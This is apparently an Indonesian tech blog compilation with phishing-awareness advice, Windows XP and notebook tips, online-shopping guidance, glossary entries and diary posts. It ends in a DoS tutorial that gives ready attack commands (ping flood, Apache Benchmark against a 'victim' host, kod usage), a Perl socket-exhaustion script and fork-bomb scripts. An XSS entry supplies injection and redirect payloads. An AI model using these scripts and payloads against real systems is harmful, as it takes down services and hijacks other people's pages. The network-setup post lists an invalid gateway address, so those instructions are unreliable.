Setelah pembicaraan cair, si penelepon lalu menanyakan konfirmasi nomor kartu kredit Anda, limit pemakaian, dan tanggal jatuh tempo. Setelah pembicaraan selesai, Anda tak sadar kalau tertipu.Kesadaran baru muncul ketika tagihan kartu kredit mencantumkan transaksi aneh yang tak Anda lakukan. Namun, saat mengajukan keberatan kepada penyedia jasa kartu kredit, mereka punya catatan transaksi yang Anda lakukan.Saat itu Anda baru sadar bahwa pembicaraan telepon beberapa waktu lalu yang meminta seluruh data kartu kredit adalah trik pelaku phising . Ternyata dengan menyebut data Anda, penelepon melakukan transaksi dan langsung mendebet sejumlah tagihan kepada kartu kredit Anda.Selain melalui telepon, Anda juga harus berhati-hati jika punya hobi berinternet. Terutama jika membalas e-mail yang yang minta informasi tentang rekening Anda, seperti user ID, PIN, serta nomor rekening dan nomor kartu.Teknik phising melalui internet dilakukan dengan menggunakan alamat e-mail palsu dan grafik. Ini untuk menyesatkan agar nasabah terpancing menerima keabsahan e-mail atau situs (website). Agar tampak meyakinkan, pelaku juga sering memanfaatkan logo atau merek dagang milik lembaga resmi, seperti bank atau penerbit kartu kredit.Bahkan, pelaku phising membuat situs palsu yang persis dengan situs suatu lembaga resmi guna memancing penjelajah dunia maya. Mereka membuat hyperlink ke website palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.Trik dagang yang merugikanSularsi dari Yayasan Lembaga Konsumen Indonesia (YLKI) Bidang Pengaduan dan Hukum mengatakan, aksi ini merupakan trik dagang yang merugikan konsumen. Awalnya adalah promosi atau iming-iming hadiah, hingga konsumen terpancing membeli barang atau memakai jasa yang ditawarkan.Oleh karena itu, dia mengimbau agar konsumen yang mendapat telepon memastikan betul siapa si penelepon yang meminta data pribadi. Jangan sampai si penelepon berhasil merayu dan mendapatkan informasi kartu kredit Anda.Informasi ini akan dimanfaatkan si penipu untuk mengakses rekening, melakukan penipuan kartu kredit, atau memandu nasabah agar melakukan transfer untuk rekening tertentu dengan iming-iming hadiah.Menurut Sularsi, jumlah pengaduan konsumen yang terkait dengan kejahatan phising mencapai 20 orang dari berbagai transaksi. Namun, jumlah itu hanya yang mengadu pada YLKI. Ia memperkirakan korban yang tak melapor lebih banyak lagi.Transaksi yang dilakukan setelah penipu melakukan phising antara lain mengikat konsumen untuk ikut membeli voucher pariwisata yang tak bisa dinikmati konsumen. Penipu juga mengikat konsumen untuk transaksi jasa lain yang belum tentu bermanfaat bagi pemegang kartu kredit.Menyinggung upaya hukum yang dilakukan YLKI, Sularsi mengatakan telah mempertanyakan tindakan hukum dari kepolisian terhadap pelaku penipuan bermodus phising. YLKI juga menyampaikan keluhan itu kepada Departemen Perdagangan, untuk mengatur usaha yang memakai trik dagang phising.Menurut dia, undang-undang perlindungan konsumen menganggap transaksi yang dilakukan tanpa persetujuan konsumen tak diakui.Sesuai dengan data yang diperoleh YLKI, phising secara global selama Januari 2005 saja melonjak 42 persen dari bulan sebelumnya. Anti-Phishing Working Group (APWG) dalam laporan bulanan mencatat 12.845 e-mail baru dan unik serta 2.560 situs palsu digunakan sebagai sarana phishing.
Tidak membagi informasiVice President-Card Marketing Head, Global Consumer Group, Citibank N.A Indonesia, Djamin Nainggolan mengatakan, bank penerbit kartu kredit seperti Citibank tak pernah memberikan data konsumen kepada pihak ketiga. Setiap karyawan yang memberikan data nasabah tanpa izin yang bersangkutan akan terkena sanksi.Bila Citibank melakukan promosi dengan pihak ketiga (misalnya asuransi), petugas Citibank akan menghubungi nasabah, baik melalui telepon, SMS, e-mail, brosur maupun iklan. ”Kami tidak pernah memperbolehkan business partner untuk menghubungi nasabah,” kata Djamin.Menurut dia, Citibank di seluruh dunia menganut janji kerahasiaan nasabah GPP (Global Privacy Promise), di mana nasabah sebelum mendapatkan kartu kredit diberi pilihan untuk tak mendapatkan apa pun penawaran.Agar nasabah tak tertipu, Djamin mengingatkan nasabah antara lain lewat customer education melalui newsletter maupun website tentang bagaimana melakukan tindakan pencegahan penipuan. Misalnya dengan tak memberikan nomor PIN kepada siapa pun, selalu rekonfirmasi atas penawaran yang diterima, dan menyimpan kartu kredit di tempat yang aman.Selain itu, Citibank biasanya juga melakukan rekonfirmasi terhadap transaksi di luar kebiasaan nasabah. Misalnya, petugas Citibank akan menelepon nasabah untuk mengonfirmasi saat terjadi transaksi di Mangga Dua Mall, Jakarta Utara, padahal pola transaksi nasabah biasanya di kawasan Pondok Indah, Jakarta Selatan.
Ciri Komunikasi yang Patut Diduga "Phising"
** Pembicaraan melalui telepon atau e-mail yang diawali dengan kabar yang menyenangkan. Misalnya Anda mendapat hadiah, kesempatan emas, atau pelayanan mudah.
** Penelepon meminta data lengkap meskipun mengaku dari perusahaan penerbit kartu kredit atau mitranya. Seharusnya penelepon atau pengirim e-mail tak perlu data nasabah kalau memang dari perusahaan penerbit kartu kredit.
** Penelepon selalu terburu-buru dalam meminta data, tidak memberikan kesempatan kepada penerima telepon untuk berpikir sebelum membuat keputusan.
** Penelepon tidak bersedia mengatur pertemuan langsung untuk melakukan transaksi.
Hal yang Harus Anda Lakukan Bila Anda menerima telepon atau e-mail dari seseorang yang tak dikenal dan Anda memperkirakannya sebagai "phising", ada baiknya berhati-hati.
** Kenali dengan pasti siapa yang meminta informasi di seberang telepon. Bila perlu minta data pribadi penelepon, alamat, serta nomor telepon kantornya.
** Pikirkan baik-baik sebelum Anda membuka data pribadi kepada orang lain. Jangan pernah terpengaruh kalau belum kenal dan tahu betul tujuan dari pihak yang meminta.
** Minta waktu untuk melakukan pengecekan dengan menghubungi pihak perusahaan si penelepon terlebih dahulu.
** Jika masih ragu, Anda sebaiknya mencari cara aman untuk bertransaksi. Akan lebih aman bila transaksi itu dilakukan secara langsung di kantor si penelepon atau kantor pemegang kartu kredit.
** Hati-hati kalau Anda berbicara karena penelepon bisa mendebet pada tagihan kartu kredit. Sebab, kalimat yang keluar dari mulut Anda sudah dianggap sebagai persetujuan yang akan diperdengarkan kembali kalau Anda keberatan dan merasa tak pernah memberikan persetujuan.
** Jika ingin lebih ekstrem, tolak secara halus setiap transaksi melalui telepon. Katakan Anda tak pernah membuat keputusan melalui telepon.

Mengetahui kombinasi shortcut yang digunakan Win-XP

Shortcut adalah merupakan salah satu fugsi menarik yang disediakan Winsows XP. Malalui shortcut anda bisa mempercepat akses sebuah proses untuk dikerjakan pada sebuah Windows XP. Windows menyediakan berbagai shortcut default untuk kenyamanan pengguna XP. Namun apa saja shortcut default yang bisa anda gunakan di windows XP? Tipsnya : Tidak selamanya mouse dapat mempercepat pekerjaan anda, bagi sebagian orang proses membuka file, copy, paste, hingga mengimpor gabar, lebih mudah dilakukan dengan menggunakan kombinasi tombol shortcut dibandingkan dengan mengklik mouse. Windows sebenarnya telah menyediakan berbagai kombinasi tombol shortcut. Namun tidak semua orang dapat mengingat semua shortcut tersebut. Anda bisa mengetahui dengan cepat kombinasi tombol apa saja yang digunakan windows sebagai shortcut. Caranya dengan membuka menu “Start – Run” dan ketik “%windir%\Help\keyshort.chm” kemudian OK/Enter. Maka sebuah jendela bernama “keyboard shortcut” bisa anda gunakan untuk mengetahui shortcut default windows XP. Cara cepat membuat tanda “lebih kurang” Tanda lebih kurang (±) sering kali anda temukan dalam dokumen, biasanya tanda ini untuk menyebutkan kisaran harga atua jumlah suatu produk dan barang. Untuk menulis tanda ini, kebanyakan pengguna PC menggunakan fasilitas “symbol” pada program Microsoft office, baik word maupun Excel. Biasanya mereka hanya mengambil sekali saja dari “symbol” dalam suatu proses editing atau pengetaikan. Selanjutnya kebanyakan dari mereka tinggal meng-copy tanda tersebut bila dibutuhkan di paragraph lainnya. Namun ada juga diantara mereka yang menulis dengan ejaan kalimatnya yaitu “lebih kurang” untuk menghemat waktu editing. Sebenarnya bagaimana untuk menulis tanda tersebut dengan cepat, tanpa harus repot menggunakan fasilitas “symbol” yang dapat dipanggil dari menu “insert” ? dengan mengetikan tanda “+” yang dilanjutkan dengan “/” dan “-“ sehingga membentuk “+/-“ tampaknya agak kurang efektif untuk dokumen anda. Untuk itu lebih baik anda menggunakan tips dari kami kali ini. Untuk membuat tanda “lebih kurang” pada dokumen, anda dapat menggunakan shortcut. Sebelum anda mengetikan jumlah bilangannya, coba anda gunakan kombinasi tombol “Alt” dan “0177”. Untuk “0177” anda harus mengetiknya dari bagian “numeric” di keyboard. Oleh karena itu, pastikan terlebih dulu fungsi “Num Lock” telah menyala. Setelah anda mengetikan kombinasi tombol tersebut, lihat hasilnya. Tanda “±” pasti telah ada di lembar kerja anda.

Tips merawat monitor notebook

Tidak seperti monitor pada umumnya, layar notebook memang mebutuhkan perhatian dan perawatan yang ekstra. Berikut ini beberapa tips yang mungkin bisa Anda manfaatkan.
• Selalu tutup notebook Anda jika tidak sedang digunakan. Jika perlu gunakan penutup anti debu dari plastik atau simpan dalam tas notebook.
• Jangan pernah menyentuh layar notebook, apalagi dengan benda tajam.
• Jangan menyemprotkan cairan pembersih langsung pada layar notebook.
• Saat notebook tertutup usahakan notebook tidak mengalami tekanan. Terutama jangan letakkan benda-benda berat di atas notebook yang tertutup.
• Jangan menutup notebook saat ada benda tertentu antara layar dan keyboard. Bahkan selembar kertas yang terjepit antara layar dan keyboard bisa menjadi penyebab kerusakan layar.
• Jangan menutup notebook dengan cara membanting.
• Untuk membersihkan layar notebook, gunakan sikat lembut yang memang dirancang untuk membersihkan layar LCD dari debu.
• Jika sikat tidak cukup, gunakan kain lembut atau tisu yang dibasahi dengan cairan pembersih. Ingat! Jangan gunakan cairan pembersih yang mengandung amoniak atau alkohol. Semprotkan cairan pembersih pada kain dan usap layar perlahan-lahan saat membersihkan.
• Cairan pembersih untuk layar notebook disarankan menggunakan jenis pembersih yang sama dengan yang digunakan untuk layar kamera digital. Cairan ini biasanya bisa didapatkan di toko penjual perlengkapan kamera.

10 hal yang perlu diperhatikan dalam membeli secara online

1. Lakukan Riset website para penjual menawarkan informasi berharga tentang produk mereka. Cetak informasi tersebut untuk referensi. selain itu, gunakan search engine seperti googel untuk mencari ulasan produk. Sebelum membeli, baca comments dan posts untuk mengetahui pendapat konsumen lain tenteng produk (dan penjual).
2. Bandingkan sebelum membeli kunjungi site-site seperti www.froogle.com dan www.bizrat.com , yang membandingkan harga-harga dari ratusan site belanja agar anda bisa mendapatkan produk dengan harga murah.
3. Carilah diskon banyak merchant online menawarkan kupon dan potongan harga yang bisa menghemat kocek anda. Untuk memanfaatkan diskon online, mungkin anda harus memasukan kode kupon di formulir pemesanan. Untuk potongan harga, anda harus mencetak formulir lalu mengirimkanya bersamaan dengan tanda terima dan bukti pembelian. Tips: banyak website menginformasikan diskon-diskon bila anda sign up pada e-mail alert mereka.
4. Skeptis hati-hati terhadap penawaran yang bombastis. Jika anda curiga, hubungii merchant dan tanyakanlah. Jika tidak terdapat alamat permanent dan telepon yang terdaftar di site, pindahlah ketempat lain. Site lelang menyediakan informasi ini setelah anda mengkonfirmasikan pembelian.
5. Bayar dengan kartu kredit kartu kredit menawarkan proteksi konsumen yang sama, baik berbelanja online maupun offline. Jangan pernah mengirimkan data kartu kredit ke siapa pun via e-mail. Site bereputasi menggunakan teknologi yang dapat mengenkripsi data selama transmisi sehingga data anda aman. Pembayaran lain, khususnya jika anda membeli via site lelang, adalah dengan membuat account diri anda sendiri di paypal {www.paypal.-com} jika anda transfer uang secara elektronik dari account bank anda ke account paypal, dan menggunakannya untuk membayar merchant.
6. Cek seals of approval jika anda ingin membeli dari online store yang belum pernah anda dengar, telitilah. Buka www.bbbonline.org {better business bureau online}. Pastikan site mencantumkan alamat fisik, tidak hanya alamat PO box. Cek seals of approval dari lembaga perlindungan konsumen seperti better business bureau online dan TRUSTe.
7. Pertimbangkan biaya pengiriman Beberapa site menawarkan bebas biaya pengiriman atau memberikan diskon biaya pengiriman untuk pembelian di atas jumlah tertentu. Manfaatkanlah itu. Bila anda menyetujui ‘pengiriman pada hari berikutnya', bisa jadi kocek yang anda keluarkan lebih banyak disbanding membeli di toko retail.
8. Perhatikan pengembalian barang dan refund policy bagaimana anda mengembalikan produk yang tidak sesuai atau rusak? Barapa lama jangka waktunya? Apakah uang di kembalikan utuh?
9. Lindungi informasi pribadi semua site bereputasi memasang privacy policy yang menerangkan apa yang mereka lakukan dengan informasi pelanggan. Bacalah dengan teliti. Jika anda tidak setuju dengan kebijaksanaan ini, jangan membili di site. Beberapa sites menjual data kepihak ketiga. Jika anda tidak keberatan pun, jangan memberikan informasi yang tidak di perlukan dengan mengisi optional field dalam formulir pemesanan.
10. Berikan feedback jika anda punya pangalaman belanja online yang memuaskan, jangan lupa untuk mewartakanya. Gunakan ‘'comments'' dan ‘'rating system'' pada website untuk menyampaikan pesan anda.

Win XP - Mengosongkan Recycle Bin dari menu konteks

Anda pasti telah mengetahui fungsi pokok dari Recycle Bin, yaitu sebagai tempat penampungan file-file yang telah dihapus. Namun, bukan langkah yang bijaksana bila tempat penampungan ini Anda biarkan begitu saja, tanpa Anda sentuh sama sekali. Recycle Bin juga memiliki batasan kapasitas dalam menampung file. Selain itu, banyaknya file yang tertampung di Recycle Bin dapat mempengaruhi kinerja PC yang Anda gunakan. Oleh karena itu, bagi pengguna Windows yang ingin agar kinerja Windows-nya tetap terpelihara, tentu mereka akan melakukan pengosongan Recycle Bin secara rutin.
Biasanya untuk mengosongkan tempat tersebut, Anda dapat melakukannya melalui klik kanan pada shortcut Recycle Bin yang berada di desktop, dengan memilih "Empty Recycle Bin". Dengan cara tersebut, berarti Anda harus selalu menemukan shortcut tersebut, baik di desktop maupun di Windows Explorer. Namun, memang begitulah cara yang diajarkan Microsoft untuk mengosongkan Recycle Bin, jika Windows Anda masih dalam keadaan standar. Padahal, dengan sedikit mengubah susunan registry, Anda tidak perlu lagi bergantung kepada shortcut Recycle Bin. Anda dapat melakukannya dari file dan folder apa saja dan dari mana saja sehingga fungsi "Empty Recycle Bin" dapat digunakan lebih fleksibel.[font=Verdana]Anda pasti telah mengetahui fungsi pokok dari Recycle Bin, yaitu sebagai tempat penampungan file-file yang telah dihapus. Namun, bukan langkah yang bijaksana bila tempat penampungan ini Anda biarkan begitu saja, tanpa Anda sentuh sama sekali. Recycle Bin juga memiliki batasan kapasitas dalam menampung file. Selain itu, banyaknya file yang tertampung di Recycle Bin dapat mempengaruhi kinerja PC yang Anda gunakan. Oleh karena itu, bagi pengguna Windows yang ingin agar kinerja Windows-nya tetap terpelihara, tentu mereka akan melakukan pengosongan Recycle Bin secara rutin.
Biasanya untuk mengosongkan tempat tersebut, Anda dapat melakukannya melalui klik kanan pada shortcut Recycle Bin yang berada di desktop, dengan memilih "Empty Recycle Bin". Dengan cara tersebut, berarti Anda harus selalu menemukan shortcut tersebut, baik di desktop maupun di Windows Explorer. Namun, memang begitulah cara yang diajarkan Microsoft untuk mengosongkan Recycle Bin, jika Windows Anda masih dalam keadaan standar. Padahal, dengan sedikit mengubah susunan registry, Anda tidak perlu lagi bergantung kepada shortcut Recycle Bin. Anda dapat melakukannya dari file dan folder apa saja dan dari mana saja sehingga fungsi "Empty Recycle Bin" dapat digunakan lebih fleksibel.
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\{645FF040-5081-101B-9F08-00AA002F954E}]@="Empty Recycle Bin"
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Empty Recycle Bin]@="{645FF040-5081-101B-9F08-00AA002F954E}"
[HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\Empty Recycle Bin]@="{645FF040-5081-101B-9F08-00AA002F954E}"
[HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\Empty Recycle Bin]@="{645FF040-5081-101B-9F08-00AA002F954E}"
[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\Empty Recycle Bin]@="{645FF040-5081-101B-9F08-00AA002F954E}"
Untuk melakukan pengubahan tersebut, Anda tidak diharuskan membuka program Registry Editor (Regedit). Cukup dengan Notepad Anda sudah dapat melakukannya. Oleh karena itu, buka program tersebut dari dalam menu "Start All Programs Acccessories Notepad". Kemudian, salin list registry seperti yang tertera di dalam boks dengan benar. Apabila sudah, simpan dengan nama "Empty.Reg". Kini, jalankan file tersebut dengan mengkliknya dua kali. Jawab semua pertanyaan yang muncul dengan "Yes" atau "OK” lalu restart PC.
Option tambahan: Empty Recycle Bin kini telah menempel dalam menu konteks
Untuk mencobanya, klik kanan pada file atau folder di dalam Windows Explorer, desktop, atau bagian mana saja yang dapat memperlihatkan file atau folder. Lihat option yang muncul pada menu konteksnya. Apabila di dalamnya sudah terdapat option "Empty Recycle Bin", Anda sudah dapat langsung menggunakannya untuk mengosongkan Recycle Bin.

Dir 777

Maksudnya direktori yang permission nya 777 (artinya bisa di read, write dan execute oleh user, group, dan other). Begitulah permission kalau di linux. Kalau di windows kan kita cuma tahu read, write dan execute saja).

XSS atau Cross Site Scripting

Teknik yang digunakan untuk menambahkan script pada sebuah website yang akan dieksekusi oleh user lain pada browser user lain tersebut.Kunci utama pada XSS yaitu user dapat memasukkan data melalui input form (contohnya input form seperti kita akan mem-posting sesuatu di forum) yang kemudian akan ditampilkan kemudian oleh user lain atau user itu sendiri. Kalau si programmer nya tidak men-strip-tags elemen HTML atau tanda bahasa pemrograman lain ya dengan udah akan bisa di cross site scripting.Contohnya gampang saja. Kalau ada buku tamu di sebuah website isi saja dengan:<.script> alert('Terima kasih'); <./script>, Kalau keluar alert javascript di browser berarti site tersebut bisa di XSS. Biasanya site2 partai politik dengan mudah bisa di XSS karena programmernya kurang jeli. mohon maaf jangan dicoba diblog ini ya,thx.Nah ... kalau udah ketahuan bisa di XSS kan kita bisa redirect langsung itu halaman ke halaman lain dengan syntax seperti ini:<.script>location.href='http://www.nurokhman.blogspot.com'; <./script> , Lari deh tuh halaman ke halaman blog saya he.. he.. (dengan catatan javascript di browser nya on).

Latency

Merupakan waktu terkecil yang diperlukan oleh jaringan untuk mengirimkan sejumlah paket data (yang paling kecil yang masih mungkin bisa dilakukan). Memang sih latency tergantung pada line speed dan kemampuan modem dan router dalam menerima dan men-transmit data.

driver toshiba notebook

ini website untuk download driver laptop/notebook toshiba : http://eu.computers.toshiba-europe.com/cgi-bin/ToshibaCSG/download_drivers_bios.jsp?service=EU&selCategory=2&selFamily=2&selSeries=153&selProduct=536&language=13&selOS=all&selType=all&yearupload=&monthupload=&dayupload=&useDate=null&mode=allMachines&search=&action=search&macId=&country=all&page=2

FTTH - Fiber To The Home

FTTH - Fiber To The Home ini bukan melulu ttg koneksi dgn Fiber Optik

ATM - Asynchronous Transfer ModeProtokol

Sytem yang didesain supaya efisien yang memungkinkan untuk transfer data secara merata sebesar 53byte.

DDoS (Distributed Denial of Service) attack

Merupakan teknik serangan yang menggunakan beberapa computer untuk menyerang computer lainnya. Si penyerang biasanya lebih refer menggunakan tipe serangan DDoS karena efeknya lebih cepat dibandingkan dengan hanya menggunakan 1 mesin penyerang.

DoS (Denial of Service) attack

Merupakan teknik serangan yang hanya menggunakan 1 computer untuk menyerang computer lain nya.

suntuk nih......

sore ini aq suntuk banget,nda tau kenapa...lebaran 4 hari lagi nih....kantor belum libur, liburnya 2 hari sebelum lebaran.......wuahhh

Nge-setting internet

Akhir bulan juli'07 kemaren aq habis ngeset internet kantor dengan layanan dari telkom-speedy, pake yang unlimited itu bulannya 750.000 + ppn 10%, itu aq bagi hanya 20 unit pc+laptop aja....yang lain nda aq share.
caranya masuk ke local area connection properties, kemudian pilih internet protocol (TC/IP0 dan pilih properties, masukan angka-angka sebagai berikut : IP address : 192.168.0.1 IP subnet :255.255.255.0 default gateway : 192.168.1.356 prefered DNS server 202.134.0.155 alternate DNS server 202.134.2.5 kemudian klik advanced, klik Add dikolom IP address dan masukkan 192.167.1.1 kemudian tutup semua window properties dan internet siap dipakai.
gitu dech....

notebook acer + toshiba

eghm, hari kemarin sampai pagi ini adalah hari kerja keras....aq harus nyelesain 2 laptop sekaligus karena trouble, compaq ama toshiba.... yang toshiba cd driver nya nda ada, terpaksa browsing di http://pc.toshiba-asia/support/downloads/index.php , banyak banget datanya.

udah gitu laptop tersebut harus aq update operating systemnya - win Xp itu dialamat : http://www.update.microsoft.com/windowsupdate/v6/default.aspx?In=es-us itu lamanya hampir 1 jam lebih aq nungguin.

itu belum aq ngerubah source code program punya finance dept. dimana software faktur pajak ama kwitansi ada masalah di output ketika ngeprint.

Apa itu DoS (Denial of Service) di internet ?

Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan yang mungkin bisa terjawab diantaranya :
1. Apa itu DoS ?
2. Apa motif cracker untuk melakukan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ? Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti hukum ini. Beberapa aktifitas DoS adalah:
1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.

.o0 Motif penyerang melakukan Denial of Service Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker dalam melakukan Denial of Service yaitu:
1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Status subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of Service merupakan aktifitas hacker diawal karirnya. Alasan politik dan ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of Service'.

Beberapa kasus serangan virus semacam 'code-red' melakukan serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut 'zombie' dalam jargon. Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat mudah untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc ...

.o0 Denial of Sevice, serangan yang menghabiskan resource. Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:
A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.
B. Bandwidth Beberapa serangan Denial of Service menghabiskan bandwidth.
C. Kernel Tables Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.
D. RAM Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot. E. Disk Serangan klasik banyak dilakukan dengan memenuhi Disk.
F. Caches
G. INETD Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.

.o0 Teknik Melakukan Denial of Service Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga tidak begitu menarik. Kita akan bahas tipe-tipe serangan DoS.
1. SYN-Flooding SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.
3. Ping Flooding Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing" (http://www.quadrunner.com/~chuegen/smurf.txt). Serangan menggunakan exploits. Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)
1. KOD (Kiss of Death) Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban. Cara penggunaan: A. Dapatkan file kod.c B. Compile dengan Gcc: $ gcc -o kod kod.c C. Gunakan: $ kod [ip_korban] -p [port] -t [hits] Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target (misalmya: blocking)
2. BONK/BOINK Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.
4. NesTea Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)
6. Syndrop Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows
7. TearDrop TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death Serangan langsung (+ 31337)

1.Ping Flood Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran. bash # ping -fs 65000 [ip_target]
2. Apache Benchmark Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melakukan penyalahgunaan. bash $ /usr/sbin/ab -n 10000 -c 300 \ http://korban.com/cgi-bin/search.cgi?q= … cukup+umum (diketik dalam 1 baris!) Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah. Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas.

Script gs.pl (gantung socket)
#!/usr/bin/perl # # Nama Script : gs.pl # Tipe : Denial of Service (DoS) # Auth : aRiee a.k.a sacrifice -> ariee@salutemus.co.uk# URL : www.sekuritionline.net # use IO::Socket; if (!$ARGV[1]) { print "Gunakan: perl gs.pl [host] [port] \n"; exit; } for (1..1300) { $fh{$_}=new IO::Socket::INET PeerAddr=> "$ARGV[0]", PeerPort=> "$ARGV[1]", Proto => "tcp" or die; print "$_\n" } # END. 27 Oktober 2003 # Lakukan dari beberapa LoginShell (komputer) ! DoS-ing Apache lagi !! Beberapa contoh skrip perl untuk melakukan DoS-ing secara local. 1. Fork Bomb, habiskan RAM #!/usr/bin/perl fork while 1; 2. Habiskan CPU #!/usr/bin/perl for (1..100) { fork or last } 1 while ++$i 3. Habiskan Memory #!/usr/bin/perl for (1..20) { fork or last } while(++$i) { fh{$i} = "X" x 0xff; } 4. Serangan Input Flooding Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat terjadi secara remote jika demon (server) tidak melakukan verifikasi input sehingga input membanjiri buffer dan menyebabkan program dihentikan secara paksa.

Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.
